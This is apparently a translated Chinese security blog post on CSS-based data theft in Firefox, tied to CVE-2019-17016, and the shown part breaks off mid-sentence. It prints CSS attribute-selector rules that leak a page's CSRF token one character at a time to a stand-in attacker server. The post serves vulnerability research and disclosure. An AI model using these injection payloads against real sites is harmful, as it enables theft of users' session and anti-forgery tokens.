在Firefox浏览器中利用CSS窃取数据CSS Transition通过改变Height实现展开收起元素从QQtabBar看css命名规范BEM的详细介绍css实现两栏布局，左侧固定宽，右侧自适应的多种方法CSS 实现Chrome标签栏的技巧CSS实现两列布局的N种方法CSS实现隐藏搜索框功能(动画正反向序列)CSS3中Animation实现简单的手指点击动画的示例详解CSS中的特指度和层叠问题详解overflow:hidden的作用(溢出隐藏、清除浮动、解决外边距塌陷)关于CSS浮动与取消浮动的问题

0x00 前言

几个月之前，我在Firefox中找到了一个漏洞（ CVE-2019-17016 ）。在研究过程中，我发现了在Firefox浏览器中利用CSS的一种数据窃取技术，可以通过单个注入点窃取数据，这里我想与大家一起分享相关研究成果。

0x01 背景知识

为了演示方便，这里假设我们想窃取 元素中的CSRF令牌。

我们无法使用脚本（可能是因为CSP），因此想寻找基于样式的注入方法。传统方法是使用属性选择器，如下所示：

 input[name='csrftoken'][value^='a'] { background: url(//ATTACKER-SERVER/leak/a); } input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b); } ... input[name='csrftoken'][value^='z'] { background: url(//ATTACKER-SERVER/leak/z); }

如果应用了CSS规则，那么攻击者就能收到HTTP请求，从而获取到令牌的第1个字符。随后，攻击者需要准备另一个样式表，其中包含已窃取的第1个字符，如下所示：

 input[name='csrftoken'][value^='aa'] { background: url(//ATTACKER-SERVER/leak/aa); } input[name='csrftoken'][value^='ab'] { background: url(//ATTACKER-SERVER/leak/ab); } ... input[name='csrftoken'][value^='az'] { background: url(//ATTACKER-SERVER/leak/az); }

通常情况下，攻击者需要重新加载